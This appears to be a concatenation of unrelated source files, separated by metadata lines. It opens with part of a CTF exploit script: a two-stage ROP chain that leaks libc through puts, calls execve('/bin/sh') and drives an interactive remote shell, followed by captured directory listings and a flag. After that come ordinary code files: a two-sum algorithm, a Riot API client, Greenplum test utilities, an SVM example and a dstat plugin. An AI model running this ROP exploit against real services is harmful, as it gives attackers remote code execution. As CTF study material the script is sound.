system_off = -0x297f0 # 0x46640
sh_off = 0x10ceab
pop_rdi = 0x00400b43 #: pop rdi ; ret ; (1 found)
pop_rsi_ = 0x00400b41 #: pop rsi ; pop r15 ; ret ; (1 found)
pop_rbp = 0x00400685 #: pop rbp ; ret ; (1 found)
leave = 0x00400795 #: leave ; ret ; (1 found)
buf = 0x6010A0
main = 0x4009E3 #before first print
stage1 = p(0xDEADBEEF)
stage1 += p(pop_rdi)
stage1 += p(puts_got)
stage1 += p(puts_plt)
stage1 += p(pop_rbp)
stage1 += p(buf+56)
stage1 += p(leave) # mov rsp, rbp; pop rbp; ret
stage1 += p(buf)
stage1 += p(main) #replay
name = stage1
raw_input("gdb")
s.send(name.ljust(1023, "\x00"))
s.send("128\n")
s.send("1\n")
for i in list(range(128)):
s.send(str(buf) + "\n")
recv_until(s, "]\n")
leak = recv_until(s, "\n").replace("\n", "").ljust(8, "\x00")
leak = u(leak)
system = leak + system_off
sh = leak + sh_off
pop_rdx = leak - 0x6e2a2
execve = leak + 0x51500
print "[+] puts@got: " + hex(leak)
print "[+] execve: " + hex(execve)
print "[+] /bin/sh: " + hex(sh)
print "[+] pop rdx; ret: " + hex(pop_rdx)
#### stage 2 #####
stage2 = "A"*64 # seip from read(), see gdb
stage2 += p(pop_rdi)
stage2 += p(sh)
stage2 += p(pop_rdx)
stage2 += p(0)
stage2 += p(pop_rsi_)
stage2 += p(0)*2
stage2 += p(execve)
name = stage2
s.send(name.ljust(1023, "\x00"))
s.recv(1024)
time.sleep(1) #/bin/id => forbidden
print "\n\n"
while 1:
s.send(raw_input("shell> ") + "\n")
print s.recv(4096)
time.sleep(0.2)
""" ls -la
total 104
drwxrwxr-x+ 22 root root 4096 Jul 18 09:23 .
drwxrwxr-x+ 22 root root 4096 Jul 18 09:23 ..
drwxr-xr-x 2 root root 4096 May 5 14:48 bin
drwxr-xr-x+ 3 root root 4096 May 19 15:53 boot
drwxr-xr-x+ 13 root root 3800 Jul 17 15:14 dev
drwxrwxr-x+ 97 root root 4096 Jul 21 16:17 etc
-r-------- 1 pwn001 root 51 May 5 15:43 flag
drwxr-xr-x 7 root root 4096 Jul 21 17:06 home
lrwxrwxrwx 1 root root 33 May 19 15:52 initrd.img -> boot/initrd.img-3.13.0-52-generic
lrwxrwxrwx 1 root root 33 Aug 13 2014 initrd.img.old -> boot/initrd.img-3.13.0-33-generic
drwxr-xr-x 21 root root 4096 May 5 14:56 lib
drwxr-xr-x 2 root root 4096 May 5 13:39 lib64
drwx------ 2 root root 16384 Aug 13 2014 lost+found
drwxr-xr-x+ 2 root root 4096 Aug 13 2014 media
drwxr-xr-x+ 2 root root 4096 Apr 11 2014 mnt
-rw-r--r-- 1 root root 399 Aug 26 2014 my_ssh_key
-rw-r--r-- 1 root root 451 Aug 26 2014 my_ssl_key
drwxr-xr-x+ 2 root root 4
096 Aug 13 2014 opt
drwxr-xr-x 101 root root 0 Jul 17 15:14 proc
drwx------ 3 root root 4096 Jul 21 17:00 root
drwxr-xr-x+ 19 root root 700 Jul 23 13:48 run
drwxr-xr-x+ 2 root root 12288 May 5 13:40 sbin
drwxr-xr-x+ 2 root root 4096 Aug 13 2014 srv
dr-xr-xr-x 13 root root 0 Jul 17 15:14 sys
drwxrwxrwt+ 2 root root 4096 Jul 25 17:39 t
mp
drwxr-xr-x+ 10 root root 4096 Aug 13 2014 usr
drwxr-xr-x+ 13 root root 4096 Jan 9 2015 var
lrwxrwxrwx 1 root root 30 May 19 15:52 vmlinuz -> boot/vmlinuz-3.13.0-52-generic
lrwxrwxrwx 1 root root 30 Aug 13 2014 vmlinuz.old -> boot/vmlinuz-3.13.0-33-generic
"""
""" ls -la /home
total 28
drwxr-xr-x 7 root root 4096 Jul 21 17:06 .
drwxrwxr-x+ 22 root root 4096 Jul 18 09:23 ..
drwx------ 2 pwn001 root 4096 May 7 10:32 pwn001
drwx------ 2 pwn002 root 4096 May 19 11:42 pwn002
drwx------ 3 pwn003 pwn003 4096 Jul 21 17:01 pwn003
drwxr-xr-x 4 tungpun tungpun 4096 Jul 21 17:04 tungpun
drwxr-xr-x 4 ubuntu ubuntu 4096 Jul 23 13:48 ubuntu
"""
"""cat /home/pwn002/fag
WhiteHat{456d6c0eaa6ab993a547389e40c3e9e5c6f188f9}
""" | 2.34375 | 2 |
SumOf2Num.py | Stephen-Kamau/Algo | 1 | 12762529 | <reponame>Stephen-Kamau/Algo<gh_stars>1-10
def SumOfTwoNums(array , target):
"""
Get THe Sum of Two Numbers from an array to match the required target
"""
#sort the array
array.sort()
NumSums = []
left = 0
right = len(array)-1
while left < right:
currSum = array[left] + array[right]
# print(left , right , currSum)
if currSum == target:
NumSums.append((array[left] , array[right]))
right -=1
left +=1
elif currSum > target:
right -=1
elif currSum < target:
left +=1
else:
print("passs")
pass
return NumSums
# using iterations
def GetTwoSumByIteration(array , target):
NumSums =[]
for i in range(len(array)-1):
for j in range(i+1 , len(array)):
currSum = array[i]+array[j]
if currSum == target:
NumSums.append((array[i],array[j]))
return NumSums
res = SumOfTwoNums([3,5,-5,8,11,1,-1,6 ,4] , 10)
print(res)
res1 = GetTwoSumByIteration([3,5,-5,8,11,1,-1,6 ,4] , 10)
print(res1)
| 3.9375 | 4 |
champData.py | Scew5145/TentacleBot | 1 | 12762530 | <reponame>Scew5145/TentacleBot
import json
import sys
import requests
class championDB:
# Class for handling riot static API requests and doing level based calcs.
riotKey = ''
# stat dicts don't need to be loaded permanently because there's no limit on static requests! Yay!
def __init__(self, _riotKey):
self.riotKey = _riotKey
def get_champId(self, championName):
# helper fuction for converting name -> id for api requests.
# -1 means bad champion name. -2 means bad url retrieval.
# Pulls from this: https://developer.riotgames.com/api-methods/#lol-static-data-v3/GET_getChampionList
id = -1
url = 'https://na1.api.riotgames.com/lol/static-data/v3/champions?dataById=true&api_key='
url += self.riotKey
response = requests.get(url)
if response.status_code != 200:
print('something went wrong with retrieving the id.')
print('Error code: ', response.status_code)
return -2
champData = json.loads(response.text)
for key in champData['data']:
if championName.lower() == champData['data'][key]['name'].lower():
id = champData['data'][key]['id']
if id == -1:
print("Couldn't find champion " + championName + '.')
return id
def get_bstats(self, championid):
url = 'https://na1.api.riotgames.com/lol/static-data/v3/champions/'
url += str(championid)
url += '?champData=stats&api_key='
url += self.riotKey
response = requests.get(url)
# handling status code errors outside of the dict. If we don't receive a good response, pass it out.
# This is so custom error messages can be used based on the context. Ex: Discord message vs print()
if response.status_code != 200:
return {'statuscode' : response.status_code}
statDict = json.loads(response.text)
statDict.update({'statuscode' : response.status_code})
# If the statDict is good, stat names can be found here:
# https://developer.riotgames.com/api-methods/#lol-static-data-v3/GET_getChampionById
return statDict
def get_levelinfo(self, level, id):
# TODO: Implement Stat calc for champion
statdict = {}
return statdict
| 2.953125 | 3 |
classroom/admin.py | HelloYeew/ta_assistant_django | 0 | 12762531 | <filename>classroom/admin.py
from django.contrib import admin
from .models import Class
admin.site.register(Class)
| 1.398438 | 1 |
src/test/tinc/tincrepo/mpp/gpdb/tests/storage/walrepl/lib/pg_util.py | khuddlefish/gpdb | 0 | 12762532 | <filename>src/test/tinc/tincrepo/mpp/gpdb/tests/storage/walrepl/lib/pg_util.py
"""
Copyright (c) 2004-Present Pivotal Software, Inc.
This program and the accompanying materials are made available under
the terms of the under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import socket
import time
import tinctest
from gppylib.db import dbconn
from tinctest.lib import local_path
from gppylib.commands.base import Command, REMOTE
from mpp.lib.PSQL import PSQL
from mpp.gpdb.tests.storage.walrepl import lib as walrepl
from mpp.gpdb.tests.storage.walrepl.lib import SmartCmd
from mpp.gpdb.tests.storage.walrepl.lib.verify import StandbyVerify
class GpUtility(object):
def __init__(self):
self.gphome = os.environ.get('GPHOME')
self.pgport = os.environ.get('PGPORT')
self.master_dd = os.environ.get('MASTER_DATA_DIRECTORY')
def run(self, command=''):
'''Runs command, returns status code and stdout '''
cmd = Command(name='Running cmd %s'%command, cmdStr="source %s/greenplum_path.sh; %s" % (self.gphome,command))
tinctest.logger.info(" %s" % cmd)
try:
cmd.run(validateAfter=False)
except Exception, e:
tinctest.logger.error("Error running command %s\n" % e)
result = cmd.get_results()
tinctest.logger.info('Command returning status code: %s'%result.rc)
tinctest.logger.info('Command returning standard output: %s'%result.stdout)
return (result.rc, result.stdout)
def run_remote(self, standbyhost, rmt_cmd, pgport = '', standbydd = ''):
'''Runs remote command and returns rc, result '''
export_cmd = "source %s/greenplum_path.sh;export PGPORT=%s;export MASTER_DATA_DIRECTORY=%s" % (self.gphome, pgport, standbydd)
remote_cmd = "gpssh -h %s -e '%s; %s'" % (standbyhost, export_cmd, rmt_cmd)
tinctest.logger.info('cmd is %s'%remote_cmd)
cmd = Command(name='Running Remote command', cmdStr='%s' % remote_cmd)
tinctest.logger.info(" %s" % cmd)
cmd.run(validateAfter=False)
result = cmd.get_results()
return result.rc,result.stdout
def check_and_start_gpdb(self):
if not self.gpstartCheck():
self.run('gpstart -a')
else:
return True
def check_and_stop_gpdb(self):
if self.gpstartCheck():
self.run('gpstop -a')
else:
return True
def gpstartCheck(self):
bashCmd = 'source ' + (self.gphome)+'/greenplum_path.sh;'+(self.gphome)+'/bin/pg_ctl status -D $MASTER_DATA_DIRECTORY | grep \'pg_ctl: server is running\''
(ok,out) = self.run(bashCmd)
if out == '' or out == []:
return False
return True
def get_pid_by_keyword(self, host="localhost", user=os.environ.get('USER'), pgport=os.environ.get('PGPORT'), keyword='None', option=''):
"""
tag
"""
# On some agents the value of the MASTER_DATA_DIRECTORY i.e keyword here
# contains // in the string which causes the grep to fail in finding the process pid
# so replacing // with /
keyword = keyword.replace("//","/")
grepCmd="ps -ef|grep postgres|grep %s|grep \'%s\'|grep \'%s\'|grep -v grep|awk \'{print $2}\'" % (pgport, keyword, option)
cmd = "%s/bin/gpssh -h %s -u %s \"%s\"" % (os.environ.get('GPHOME'), host, user, grepCmd)
(rc, out) = self.run(cmd)
output = out.split()
if not rc and len(output) > 1:
return output[2]
else:
tinctest.logger.error("error: process %s does not exist on host %s"%(keyword,host))
return -1
def gpstart_and_verify(self, master_dd=os.environ.get('MASTER_DATA_DIRECTORY'), host='localhost'):
pid = walrepl.get_postmaster_pid(master_dd, host)
tinctest.logger.info("gpstart_verify: master dd is %s, host is %s, master pid is %s"%(master_dd,host, pid))
if pid == -1:
return False
cmd_str = 'kill -s 0 {pid}'.format(pid=pid)
cmd = SmartCmd(cmd_str, host=host)
cmd.run()
results = cmd.get_results()
return results.rc == 0
def gpstop_and_verify(self, option = ''):
"""
stop, and verify all the cluster completely shutdown
"""
sql = 'select hostname, port, content, preferred_role from gp_segment_configuration;'
segments = self.run_SQLQuery(sql,dbname= 'template1')
if option == '-u':
std_sql = 'drop user if exists gptest; create user gptest LOGIN PASSWORD \'<PASSWORD>\'; '
PSQL.run_sql_command(std_sql, flags = '-q -t', dbname= 'template1')
new_entry = 'local all gptest password \n'
self.add_entry(line = new_entry)
self.run('gpstop -a %s'%option)
return self.gpreload_verify('gptest', 'testpassword')
(rc, output) = self.run('gpstop -a %s'%option)
if rc != 0:
return False
if option == '-r':
no_sync_up_segment_sql = 'select content, preferred_role from gp_segment_configuration where mode <> \'s\' or status <> \'u\';'
segments_with_issue = self.run_SQLQuery(no_sync_up_segment_sql,dbname= 'template1')
if segments_with_issue:
return False
elif option == '-y':
for segment in segments:
seg_content = segment[2]
seg_preferred_role = segment[3]
seg_host = segment[0]
seg_port = segment[1]
if seg_content == -1 and seg_preferred_role == 'm':
pid = self.get_pid_by_keyword(host=seg_host, pgport=seg_port, keyword='bin')
if pid < 0:
tinctest.logger.error("standby host should not be shutdown.")
else:
pid = self.get_pid_by_keyword(host=seg_host, pgport=seg_port, keyword='bin')
if pid > 0:
tinctest.logger.error("%s segment on host %s was not properly shutdown"%(seg_preferred_role, seg_host))
return False
elif option == '-m':
for segment in segments:
seg_content = segment[2]
seg_preferred_role = segment[3]
seg_host = segment[0]
seg_port = segment[1]
if seg_content == -1 and seg_preferred_role == 'p':
pid = self.get_pid_by_keyword(host=seg_host, pgport=seg_port, keyword='bin')
if pid > 0:
tinctest.logger.error("master should shutdown but still is running")
return False
else:
pid = self.get_pid_by_keyword(host=seg_host, pgport=seg_port, keyword='bin')
if pid < 0:
tinctest.logger.error("%s segment on host %s should not be shutdown"%(seg_preferred_role, seg_host))
return False
else:
for segment in segments:
seg_content = segment[2]
seg_preferred_role = segment[3]
seg_host = segment[0]
seg_port = segment[1]
pid = self.get_pid_by_keyword(host=seg_host, pgport=seg_port, keyword='bin')
if pid > 0:
tinctest.logger.error("%s segment on host %s was not properly shutdown"%(seg_preferred_role, seg_host))
return False
return True
def check_standby_presence(self):
get_stdby = 'select hostname from gp_segment_configuration where content = -1 and preferred_role = \'m\';'
host = PSQL.run_sql_command(get_stdby, flags='-q -t', dbname='template1')
if host.strip():
return True
else:
return False
def add_entry(self, line = ''):
''' add one entry into the pg_hba.conf'''
with open(local_path(self.master_dd + '/pg_hba.conf'),'a') as pgfile:
pgfile.write(line)
def gpreload_verify(self, user, password):
'''verify that the entry is effective after reload '''
cmd = 'export PGPASSWORD=%s; psql -U %s -d template1'%(password, user)
(rc, out) = self.run(command = cmd)
if "FATAL" in out or rc != 0:
return False
else:
return True
def install_standby(self, new_stdby_host = '', standby_mdd=os.environ.get('MASTER_DATA_DIRECTORY')):
"""
Creating a new standby, either on localhost, or on a remote host
failback: if set to be true, means that installs a standby master to the old master's dir, later to be activated.
standby_mdd: by default, will be under $MASTER_DATA_DIRECTORY/newstandby, but can be set to other dir.
new_stdby_host: if empty, will automatically use the first primary segment node as default standby host.
"""
if new_stdby_host == '':
get_host = 'select hostname from gp_segment_configuration where content = 0 and preferred_role = \'p\';'
host = PSQL.run_sql_command(get_host, flags = '-q -t', dbname= 'template1')
new_stdby_host = host.strip()
tinctest.logger.info("New standby host to config %s" % new_stdby_host)
if not new_stdby_host:
raise Exception("Did not get a valid host name to install standby")
standbyport = str(int(self.pgport) + 1)
(standby_filespace,filespace_loc) = self.get_concatinate_filespace(standby_mdd)
for fsp in filespace_loc:
self.create_dir(new_stdby_host,fsp)
self.clean_dir(new_stdby_host, fsp)
init_stdby = "gpinitstandby -a -s %s -P %s -F \'%s\'"%(new_stdby_host,
standbyport,
standby_filespace)
tinctest.logger.info("New standby init command: %s" % init_stdby)
self.run(init_stdby)
def get_concatinate_filespace(self, standby_mdd=os.environ.get('MASTER_DATA_DIRECTORY')):
'''
Get a concatinated filespace string, to create standby on a host with dir equal to: filespace_dir/newstandby
'''
standby_dir = os.path.split(standby_mdd)[0]
last_dir = os.path.split(standby_dir)[1]
pg_system_filespace = os.path.join(os.path.split(standby_dir)[0], last_dir + '_newstandby')
pg_filespace = 'pg_system:'+ pg_system_filespace
fs_sql = '''select fselocation from pg_filespace_entry
where fsefsoid != 3052 and fsedbid = (select dbid from gp_segment_configuration
where role = 'p' and content = -1);'''
result = PSQL.run_sql_command(fs_sql, flags = '-q -t', dbname= 'template1')
result = result.strip()
filespace_loc = result.split('\n')
tinctest.logger.info('filespace_loc: %s'%filespace_loc)
fsp_dir = []
fsp_dir.append(pg_system_filespace)
for fse_loc in filespace_loc:
fse_loc = fse_loc.strip()
if fse_loc != '':
# get leafe node from the dir
prune_last1 = os.path.split(fse_loc)[0]
# get the second level node name from backward
parent_dir = os.path.split(prune_last1)[1]
# remove the second level and continue to get the third level leafe node which is the filespace name
prune_last2 = os.path.split(prune_last1)[0]
filespace = os.path.split(prune_last2)[1]
# specify the filespace location on standby side
filespace_location_stdby = os.path.split(standby_dir)[0] + '_newstandby' + '/'+filespace+'/'+parent_dir + '/' + last_dir + '_newstandby'
pg_filespace = pg_filespace + ',' + filespace + ':' + filespace_location_stdby
fsp_dir.append(filespace_location_stdby)
tinctest.logger.info("pg_filespace is %s"%pg_filespace)
tinctest.logger.info("fsp_dir is %s"%fsp_dir)
return (pg_filespace,fsp_dir)
def failback_to_original_master(self, old_mdd = os.environ.get('MASTER_DATA_DIRECTORY'),new_master_host = '', new_master_mdd=os.environ.get('MASTER_DATA_DIRECTORY'), new_master_port = ''):
"""
Creating a new standby, either on localhost, or on a remote host
failback: if set to be true, means that installs a standby master to the old master's dir, later to be activated.
standby_mdd: by default, will be under $MASTER_DATA_DIRECTORY/newstandby, but can be set to other dir.
new_stdby_host: if empty, will automatically use the first primary segment node as default standby host.
"""
(master_filespace,filespace_loc) = self.get_concatinate_filespace_new_master(old_mdd, new_master_host, new_master_mdd, new_master_port)
tinctest.logger.info('master_filespace is %s'%master_filespace)
tinctest.logger.info('filespace_loc %s'%filespace_loc)
for fsp in filespace_loc:
self.create_dir(socket.gethostname(),fsp)
self.clean_dir(socket.gethostname(),fsp)
init_stdby = "gpinitstandby -a -s %s -P %s -F \'%s\'"%(socket.gethostname(),
self.pgport,
master_filespace)
tinctest.logger.info("New standby init command: %s" % init_stdby)
self.run_remote(new_master_host, init_stdby, new_master_port, new_master_mdd)
self.activate(old_mdd,new_master_host, new_master_mdd, new_master_port)
def activate(self, old_mdd=os.environ.get('MASTER_DATA_DIRECTORY'), new_master_host='', new_master_mdd='', new_master_port=''):
''' Stop the remote master and activate new standby on old master host'''
self.run_remote(new_master_host, 'gpstop -aim', new_master_port, new_master_mdd)
gpactivate_cmd = 'gpactivatestandby -a -d %s' %(old_mdd)
(rc, result) = self.run_remote(socket.gethostname(),gpactivate_cmd,self.pgport,self.master_dd)
tinctest.logger.info('Result without force option to activate standby %s'%result)
if (rc != 0) and result.find('Force activation required') != -1:
tinctest.logger.info('activating standby failed, try force activation...')
gpactivate_cmd = 'gpactivatestandby -a -f -d %s' %(old_mdd)
(rc, result) = self.run_remote(socket.gethostname(),gpactivate_cmd,self.pgport,self.master_dd)
if (rc != 0):
tinctest.logger.error('Force activating standby failed!')
return False
tinctest.logger.info('standby acvitated, host value %s' % socket.gethostname())
return True
def get_concatinate_filespace_new_master(self, old_mdd, new_master_host='', new_master_mdd='', new_master_port=''):
'''
Get a concatinated filespace string, inorder to init a standby on the old master host
'''
fs_sql = ''' select fselocation from pg_filespace_entry
where fsefsoid != 3052 and fsedbid = (select dbid from gp_segment_configuration
where role = 'p' and content = -1);'''
file = '/tmp/filespace.sql'
fp = open(file,'w')
fp.write(fs_sql)
fp.close()
cmd = 'scp %s %s:/tmp'%(file, new_master_host)
self.run(cmd)
#new_master_postfix = os.path.split(new_master_mdd)[1]
pg_system_filespace = old_mdd
last_dir = os.path.split(old_mdd)[1]
pg_filespace = 'pg_system:'+ pg_system_filespace
get_filespace_cmd = 'psql --pset pager=off template1 -f %s'%file
tinctest.logger.info('remote command to run for getting filespace locations %s'%get_filespace_cmd)
(rc, stdout) = self.run_remote(new_master_host, get_filespace_cmd, new_master_port, new_master_mdd)
tinctest.logger.info('stdout from remote executing sqls on new master is %s'%stdout)
result = stdout.strip()
filespace_loc = result.split('\n')
for i in xrange(3):
if not filespace_loc:
break
else:
filespace_loc.pop(0)
for i in xrange(2):
if not filespace_loc:
break
else:
filespace_loc.pop()
tinctest.logger.info('after removing unncessary result from gpssh, filespace_loc is %s'%filespace_loc)
# strip and split each line, to retrieve each filespace loc
filespace_list = []
for fse_loc in filespace_loc:
fse_loc = fse_loc.strip().split(' ')[2]
filespace_list.append(fse_loc)
tinctest.logger.info('filespace_list: %s'%filespace_list)
tinctest.logger.info('split and continue removing unncessary information from gpssh, filespace_list is %s'%filespace_list)
fsp_dir = []
fsp_dir.append(pg_system_filespace)
for fse_loc in filespace_list:
fse_loc = fse_loc.strip()
if fse_loc != '':
# truncate the last two leafe nodes inorder to get the filespace name
prune_last1 = os.path.split(fse_loc)[0]
prune_last2 = os.path.split(prune_last1)[0]
filespace = os.path.split(prune_last2)[1]
filespace_location_stdby = prune_last1.replace('_newstandby', '') + '/' + last_dir
#prune_last1 = prune_last1.replace(new_master_postfix,'master')
pg_filespace = pg_filespace + ',' + filespace + ':' + filespace_location_stdby
fsp_dir.append(filespace_location_stdby)
tinctest.logger.info("pg_filespace is %s"%pg_filespace)
tinctest.logger.info("fsp_dir is %s"%fsp_dir)
return (pg_filespace,fsp_dir)
def clean_dir(self,host,dir):
cmd = "%s/bin/gpssh -h %s -e 'rm -rf %s'" % (self.gphome,host,dir)
self.run(cmd)
def create_dir(self, host, dir):
cmd = "%s/bin/gpssh -h %s -e 'mkdir -p %s'" % (self.gphome,host,dir)
self.run(cmd)
def remove_standby(self):
self.run('gpinitstandby -r -a')
def run_SQLQuery(self, exec_sql, dbname, hostname='localhost', port=os.environ['PGPORT']):
with dbconn.connect(dbconn.DbURL(dbname=dbname, hostname=hostname, port=port)) as conn:
curs = dbconn.execSQL(conn, exec_sql)
results = curs.fetchall()
return results
def stop_logger_process(self, host, port):
grep_expr = '[p]ostgres: port\s*%s,.*logger process' % port
tinctest.logger.info('Grep expr = %s' % grep_expr)
if host:
cmd = Command('get the pid for a primary process', cmdStr='ps -ef | grep "%s" | awk \'{print \$2}\'' % grep_expr,
ctxt=REMOTE, remoteHost=host)
else:
cmd = Command('get the pid for a primary process', cmdStr='ps -ef | grep "%s" | awk \'{print $2}\'' % grep_expr)
cmd.run(validateAfter=True)
result = cmd.get_results()
tinctest.logger.info('Result of grep command = %s' % result)
pid_list = map(int, result.stdout.strip().split('\n'))
for pid in pid_list:
tinctest.logger.info('Killing primary segment with pid %s' % pid)
if host:
cmd = Command('Stop a logger process', cmdStr='kill -SIGSTOP %s' % pid, ctxt=REMOTE, remoteHost=host)
else:
cmd = Command('Stop a logger process', cmdStr='kill -SIGSTOP %s' % pid, ctxt=REMOTE, remoteHost=host)
cmd.run(validateAfter=True)
def stop_postmaster_process(self, host, port):
grep_expr = '[p]ostgres -D .* -p %s' % port
tinctest.logger.info('Grep expr = %s' % grep_expr)
if host:
cmd = Command('get the pid for a primary process', cmdStr='ps -ef | grep "%s" | awk \'{print \$2}\'' % grep_expr,
ctxt=REMOTE, remoteHost=host)
else:
cmd = Command('get the pid for a primary process', cmdStr='ps -ef | grep "%s" | awk \'{print $2}\'' % grep_expr)
cmd.run(validateAfter=True)
result = cmd.get_results()
tinctest.logger.info('Result of grep command = %s' % result)
pid_list = map(int, result.stdout.strip().split('\n'))
for pid in pid_list:
tinctest.logger.info('Killing primary segment with pid %s' % pid)
if host:
cmd = Command('Stop a process on remote host', cmdStr='kill -SIGSTOP %s' % pid, ctxt=REMOTE, remoteHost=host)
else:
cmd = Command('Stop a process on remote host', cmdStr='kill -SIGSTOP %s' % pid)
cmd.run(validateAfter=True)
def stop_gpmmon_process(self, hostname):
grep_expr = '[g]pmmon -D .*'
tinctest.logger.info('Grep expr = %s' % grep_expr)
cmd = Command('get the pid for gpmmon', cmdStr="ps -ef | grep '%s' | awk '{print \$2}'" % grep_expr, ctxt=REMOTE, remoteHost=hostname)
cmd.run(validateAfter=True)
result = cmd.get_results()
pid = ' '.join([p.strip() for p in result.stdout.strip().split('\n')])
if pid:
cmd = Command('stopping the gpmmon process', cmdStr='kill -SIGSTOP %s' % pid, ctxt=REMOTE, remoteHost=hostname)
cmd.run(validateAfter=True)
else:
raise Exception('Unable to find gpmmon process. Please make sure it is installed')
def stop_gpsmon_process(self, hostname):
grep_expr = '[g]psmon -m .*'
tinctest.logger.info('Grep expr = %s on host %s' % (grep_expr, hostname))
retries = 60
for r in range(retries):
cmd = Command('get the pid for gpsmon', cmdStr="ps -ef | grep '%s' | awk '{print \$2}'" % grep_expr, ctxt=REMOTE, remoteHost=hostname)
cmd.run(validateAfter=True)
result = cmd.get_results()
if not result.stdout.strip() or len(result.stdout.strip().split('\n')) > 1:
time.sleep(1)
continue
pid = ' '.join([p.strip() for p in result.stdout.strip().split('\n')])
if pid:
cmd = Command('stopping the gpsmon process', cmdStr='kill -SIGSTOP %s' % pid, ctxt=REMOTE, remoteHost=hostname)
cmd.run(validateAfter=True)
break
else:
raise Exception('Unable to find gpsmon process. Please make sure it is installed')
def verify_gpmmon(self):
gpmmon_grep_expr = '[g]pmmon -D .*'
cmd = Command('get the pid for gpmmon', cmdStr="ps -ef | grep '%s' | awk '{print $2}'" % gpmmon_grep_expr)
try:
cmd.run(validateAfter=True)
except Exception as e:
pass
else:
result = cmd.get_results()
if result.stdout.strip() != '':
raise Exception('Found gpmmon process with pid %s' % result.stdout.strip())
def verify_gpsmon(self, hostname):
gpsmon_grep_expr = '[g]psmon -m .*'
cmd = Command('get the pid for gpsmon process', cmdStr="ps -ef | grep '%s' | awk '{print \$2}'" % gpsmon_grep_expr,
ctxt=REMOTE, remoteHost=hostname)
try:
cmd.run(validateAfter=True)
except Exception as e:
pass
else:
result = cmd.get_results()
if result.stdout.strip() != '':
raise Exception('Found gpsmon process with pid %s' % result.stdout.strip())
| 2 | 2 |
tests/example_svmlr.py | salmuz/svm-label-ranking | 2 | 12762533 | <reponame>salmuz/svm-label-ranking<gh_stars>1-10
from svm_label_ranking import arff
from svm_label_ranking.model import SVMLR
# Example script of executing the svm multi label model.
# By default, we set the possible value of hyper-parameter v=[0.1, 0.4, 0.7, 0.9, 8, 24, 32, 128]. It could be
# assigned to other values by modifying the __init__ of the class.
# We start by creating an instance of the base classifier we want to use
print("Example of SVM label ranking - Data set IRIS \n")
v = list([0.1, 0.4, 0.7, 0.9, 8, 24, 32, 128])
model = SVMLR(DEBUG=True)
data_arff = arff.ArffFile()
data_arff.load("iris_dense.xarff")
# Learning
model.learn(data_arff)
print("Process learning with quadratic-programming algorithm finished")
# Prediction
predictions = model.evaluate([data_arff.data[120]])
print("Prediction with quadratic-programing cvxopt is \n")
print(predictions, data_arff.data[120][-1:])
print(model.evaluate([data_arff.data[0]]), data_arff.data[0][-1:])
print("\n")
# Learning
model.learn(data_arff, solver='frank-wolfe')
print("Process learning with frank-wolfe algorithm finished")
predictions = model.evaluate([data_arff.data[120]])
print("Prediction with frank-wolfe is \n")
print(predictions, data_arff.data[120][-1:])
print(model.evaluate([data_arff.data[0]]), data_arff.data[0][-1:])
print("\n")
model.plot_solver_convergence()
| 3.125 | 3 |
tests/suite/oop/reflection/helpers/test_is_callable.py | infosmith/batteries | 0 | 12762534 | <filename>tests/suite/oop/reflection/helpers/test_is_callable.py
import unittest
import pytest
from helpers.oop.reflection.helpers import is_callable as uut
@pytest.mark.usefixtures('oop_reflection_testcase')
class TestIsCallable(unittest.TestCase):
def test_is_callable_with_function(self):
self.assertTrue(uut(print))
def test_is_callable_with_instance_method(self):
self.assertTrue(uut('instance_method', instance=self.testcase))
| 2.703125 | 3 |
inheritance/zoo/project/bear.py | borko81/SU_OOP_2021 | 0 | 12762535 | from polymorhism.project import Mammal
class Bear(Mammal):
pass | 1.078125 | 1 |
ReverseLinkedList.py | NickMonks/AlgorithmsAndDataStructure | 0 | 12762536 | <gh_stars>0
# This is an input class. Do not edit.
class LinkedList:
def __init__(self, value):
self.value = value
self.next = None
def reverseLinkedList(head):
# The trick of the problem is that we need to use three pointers, not two (which is the common pattern).
# the first and third pointer act as a reference and the second one (P2) is the visited one. So, the condition is that when p2 is null, then we have
# reversed the linked list. At the beginning we start with P1 = null (there's nothing on the left of P2), P2 as first element and p3 and the second one.
# in order, the algorithm should do the following:
# p2.next = p1
# p1 = p2
# p2 = p3
# p3 = p3.next
# Initialisation of p1 and p2
p1, p2 = None, head
while p2 is not None:
# why we do this here?
# p2 as the tail of the LL, and so p3 is null; so we are doing None.next which will give an attr error
# p3 = p2.next, we could do p3 = p3.next if not None else p3
p3 = p2.next
p2.next = p1
p1 = p2
p2 = p3
# when p2 is pointing to none, p1 is the final element in the list, which is the new head!
return p1 | 4 | 4 |
initrd/usr/share/dstat/dstat_wifi.py | OpenCloudOS/OpenCloudOS-tools | 8 | 12762537 | <reponame>OpenCloudOS/OpenCloudOS-tools
global iwlibs
from pythonwifi import iwlibs
class dstat_plugin(dstat):
def __init__(self):
self.name = 'wifi'
self.type = 'd'
self.width = 3
self.scale = 33
self.check()
self.vars = iwlibs.getNICnames()
self.nick = ('lnk', 's/n')
self.cols = 2
def check(self):
global iwlibs
try:
from pythonwifi import iwlibs
except:
raise Exception, 'Needs python-wifi module'
def extract(self):
for name in self.vars:
wifi = iwlibs.Wireless(name)
stat, qual, discard, missed_beacon = wifi.getStatistics()
# print qual.quality, qual.signallevel, qual.noiselevel
if qual.quality == 0 or qual.signallevel == -101 or qual.noiselevel == -101 or qual.signallevel == -256 or qual.noiselevel == -256:
self.val[name] = ( -1, -1 )
else:
self.val[name] = ( qual.quality, qual.signallevel * 100 / qual.noiselevel )
# vim:ts=4:sw=4:et
| 2.59375 | 3 |
third_party/closure_compiler/compiler.py | zealoussnow/chromium | 14,668 | 12762538 | <reponame>zealoussnow/chromium<filename>third_party/closure_compiler/compiler.py
#!/usr/bin/python
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Runs Closure compiler on JavaScript files to check for errors and produce
minified output."""
from __future__ import print_function
import os
import subprocess
_CURRENT_DIR = os.path.join(os.path.dirname(__file__))
_JAVA_PATH = os.path.join(_CURRENT_DIR, "..", "jdk", "current", "bin", "java")
assert os.path.isfile(_JAVA_PATH), "java only allowed in android builds"
class Compiler(object):
"""Runs the Closure compiler on given source files to typecheck them
and produce minified output."""
_JAR_COMMAND = [
_JAVA_PATH,
"-jar",
"-Xms1024m",
"-client",
"-XX:+TieredCompilation",
]
def __init__(self, verbose=False):
"""
Args:
